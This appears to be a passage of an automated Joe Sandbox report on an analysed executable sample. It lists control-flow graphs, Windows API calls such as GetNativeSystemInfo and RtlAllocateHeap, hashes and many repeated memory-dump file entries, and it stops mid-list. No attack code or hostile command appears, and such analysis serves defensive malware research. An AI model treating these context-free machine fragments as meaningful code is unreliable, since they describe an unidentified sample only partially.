                                                                                                                                                                                                                                                                            control_flow_graph 561 57d30-57db2 call 840f0 565 58356-58373 call 6cff1 561->565 566 57db8-57de0 call 67a00 call 55c10 561->566 573 57de4-57e06 call 67a00 call 55c10 566->573 574 57de2 566->574 579 57e08 573->579 580 57e0a-57e23 573->580 574->573 579->580 583 57e25-57e34 580->583 584 57e54-57e7f 580->584 587 57e36-57e44 583->587 588 57e4a-57e51 call 6d663 583->588 585 57e81-57e90 584->585 586 57eb0-57ed1 584->586 591 57ea6-57ead call 6d663 585->591 592 57e92-57ea0 585->592 593 57ed7-57edc 586->593 594 57ed3-57ed5 GetNativeSystemInfo 586->594 587->588 589 58374 call 86c6a 587->589 588->584 599 58379-5837f call 86c6a 589->599 591->586 592->589 592->591 598 57edd-57ee6 593->598 594->598 602 57f04-57f07 598->602 603 57ee8-57eef 598->603 606 582f7-582fa 602->606 607 57f0d-57f16 602->607 604 57ef5-57eff 603->604 605 58351 603->605 609 5834c 604->609 605->565 606->605 612 582fc-58305 606->612 610 57f29-57f2c 607->610 611 57f18-57f24 607->611 609->605 614 582d4-582d6 610->614 615 57f32-57f39 610->615 611->609 616 58307-5830b 612->616 617 5832c-5832f 612->617 618 582e4-582e7 614->618 619 582d8-582e2 614->619 620 57f3f-57f9b call 67a00 call 55c10 call 67a00 call 55c10 call 55d50 615->620 621 58019-582bd call 67a00 call 55c10 call 67a00 call 55c10 call 55d50 call 67a00 call 55c10 call 55730 call 67a00 call 55c10 call 67a00 call 55c10 call 55d50 call 67a00 call 55c10 call 55730 call 67a00 call 55c10 call 67a00 call 55c10 call 55d50 call 67a00 call 55c10 call 55730 call 67a00 call 55c10 call 67a00 call 55c10 call 55d50 call 67a00 call 55c10 call 55730 615->621 622 58320-5832a 616->622 623 5830d-58312 616->623 624 58331-5833b 617->624 625 5833d-58349 617->625 618->605 626 582e9-582f5 618->626 619->609 646 57fa0-57fa7 620->646 660 582c3-582cc 621->660 622->605 623->622 628 58314-5831e 623->628 624->605 625->609 626->609 628->605 648 57fa9 646->648 649 57fab-57fcb call 88bbe 646->649 648->649 655 58002-58004 649->655 656 57fcd-57fdc 649->656 655->660 661 5800a-58014 655->661 658 57ff2-57fff call 6d663 656->658 659 57fde-57fec 656->659 658->655 659->599 659->658 660->606 665 582ce 660->665 661->660 665->614
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00057ED3
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2150495137.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150171763.0000000000050000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150495137.00000000000B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150804554.00000000000B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150890075.00000000000BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150919180.00000000000C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151162610.000000000021C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151190617.000000000021E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151232379.0000000000236000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151232379.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151289980.000000000024D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151319542.000000000024E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151399260.000000000025E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151427420.000000000025F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151502289.0000000000272000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151528684.0000000000273000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151551208.0000000000274000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151604752.0000000000275000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151642466.000000000027D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151662777.0000000000282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151680680.0000000000284000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151699291.0000000000289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151726942.000000000029E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151748641.00000000002A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151768479.00000000002A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151786460.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151805122.00000000002AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151825913.00000000002B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151852238.00000000002B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151874517.00000000002B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151901567.00000000002C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151928483.00000000002C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151956717.00000000002CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151979173.00000000002D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151999880.00000000002D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152022406.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152050708.00000000002E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152072352.00000000002E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152072352.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152136326.0000000000337000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152160407.0000000000338000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152183065.000000000034C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152203849.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152224214.000000000034E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152248990.0000000000353000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152269027.0000000000355000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152290652.0000000000363000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152309411.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: InfoNativeSystem
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1721193555-0
                                                                                                                                                                                                                                                                            • Opcode ID: 98ea5a510ec89c91e04b566eaa39d84d0589f5902bfdcd3f236e6ec8aaa32d67
                                                                                                                                                                                                                                                                            • Instruction ID: b7beb9a7458ae1d9bce63cfb1d71e748db064c0b70ee155c04f1465e93dff41d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 98ea5a510ec89c91e04b566eaa39d84d0589f5902bfdcd3f236e6ec8aaa32d67
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B5E1D370E006449BDB24BB68DC1B3DE7A62AB41725F94429CEC196B3C3DB355F8887C2
                                                                                                                                                                                                                                                                            Function 0008D82F Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 860 8d82f-8d83a 861 8d848-8d84e 860->861 862 8d83c-8d846 860->862 864 8d850-8d851 861->864 865 8d867-8d878 RtlAllocateHeap 861->865 862->861 863 8d87c-8d887 call 875f6 862->863 869 8d889-8d88b 863->869 864->865 866 8d87a 865->866 867 8d853-8d85a call 89dc0 865->867 866->869 867->863 873 8d85c-8d865 call 88e36 867->873 873->863 873->865
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0008A813,00000001,00000364,00000006,000000FF,?,0008EE3F,?,00000004,00000000,?,?), ref: 0008D871
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2150495137.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150171763.0000000000050000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150495137.00000000000B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150804554.00000000000B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150890075.00000000000BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150919180.00000000000C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151162610.000000000021C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151190617.000000000021E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151232379.0000000000236000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151232379.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151289980.000000000024D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151319542.000000000024E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151399260.000000000025E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151427420.000000000025F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151502289.0000000000272000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151528684.0000000000273000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151551208.0000000000274000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151604752.0000000000275000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151642466.000000000027D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151662777.0000000000282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151680680.0000000000284000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151699291.0000000000289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151726942.000000000029E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151748641.00000000002A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151768479.00000000002A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151786460.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151805122.00000000002AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151825913.00000000002B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151852238.00000000002B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151874517.00000000002B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151901567.00000000002C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151928483.00000000002C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151956717.00000000002CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151979173.00000000002D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151999880.00000000002D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152022406.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152050708.00000000002E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152072352.00000000002E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152072352.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152136326.0000000000337000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152160407.0000000000338000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152183065.000000000034C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152203849.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152224214.000000000034E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152248990.0000000000353000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152269027.0000000000355000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152290652.0000000000363000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152309411.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                            • Opcode ID: 3f99445f38f91092e09f09d0b13901295d327cd05f44e420c2a881f5e02c90be
                                                                                                                                                                                                                                                                            • Instruction ID: 37a6cb8aa3a3cfe493da882a576574da6ad337c570f07009116d2a7b4577ecca
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3f99445f38f91092e09f09d0b13901295d327cd05f44e420c2a881f5e02c90be
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A7F0E931501625E6EB713B729C05AAB7799FF45370F288323EC88971C1DE20DC0083E0
                                                                                                                                                                                                                                                                            Function 000587B2 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?,0005DA1D,?,?,?,?), ref: 000587B9
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2150495137.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150171763.0000000000050000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150495137.00000000000B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150804554.00000000000B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150890075.00000000000BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150919180.00000000000C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151162610.000000000021C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151190617.000000000021E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151232379.0000000000236000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151232379.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151289980.000000000024D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151319542.000000000024E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151399260.000000000025E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151427420.000000000025F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151502289.0000000000272000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151528684.0000000000273000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151551208.0000000000274000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151604752.0000000000275000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151642466.000000000027D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151662777.0000000000282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151680680.0000000000284000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151699291.0000000000289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151726942.000000000029E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151748641.00000000002A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151768479.00000000002A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151786460.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151805122.00000000002AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151825913.00000000002B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151852238.00000000002B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151874517.00000000002B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151901567.00000000002C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151928483.00000000002C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151956717.00000000002CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151979173.00000000002D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151999880.00000000002D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152022406.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152050708.00000000002E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152072352.00000000002E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152072352.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152136326.0000000000337000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152160407.0000000000338000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152183065.000000000034C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152203849.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152224214.000000000034E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152248990.0000000000353000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152269027.0000000000355000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152290652.0000000000363000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152309411.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                            • Opcode ID: 2a19cc5d0097f83ea188fdf5238bd1f19be93d19ff48272e30cfb061dd0fc2a0
                                                                                                                                                                                                                                                                            • Instruction ID: c4cd2bc4e9bc098f3b521a25ce5755b614cdbde139ab9105eab3961764ef75ef
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2a19cc5d0097f83ea188fdf5238bd1f19be93d19ff48272e30cfb061dd0fc2a0
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D3C08C2802960809FD1C453811998AA338A4B4F7EA3F49B94EC706B1E1DA35EC0F9350
                                                                                                                                                                                                                                                                            Function 000587B0 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?,0005DA1D,?,?,?,?), ref: 000587B9
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2150495137.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150171763.0000000000050000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150495137.00000000000B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150804554.00000000000B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150890075.00000000000BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150919180.00000000000C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151162610.000000000021C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151190617.000000000021E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151232379.0000000000236000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151232379.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151289980.000000000024D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151319542.000000000024E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151399260.000000000025E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151427420.000000000025F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151502289.0000000000272000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151528684.0000000000273000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151551208.0000000000274000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151604752.0000000000275000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151642466.000000000027D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151662777.0000000000282000.00000040.00000001.01000000.00000003.sdmpDownload File
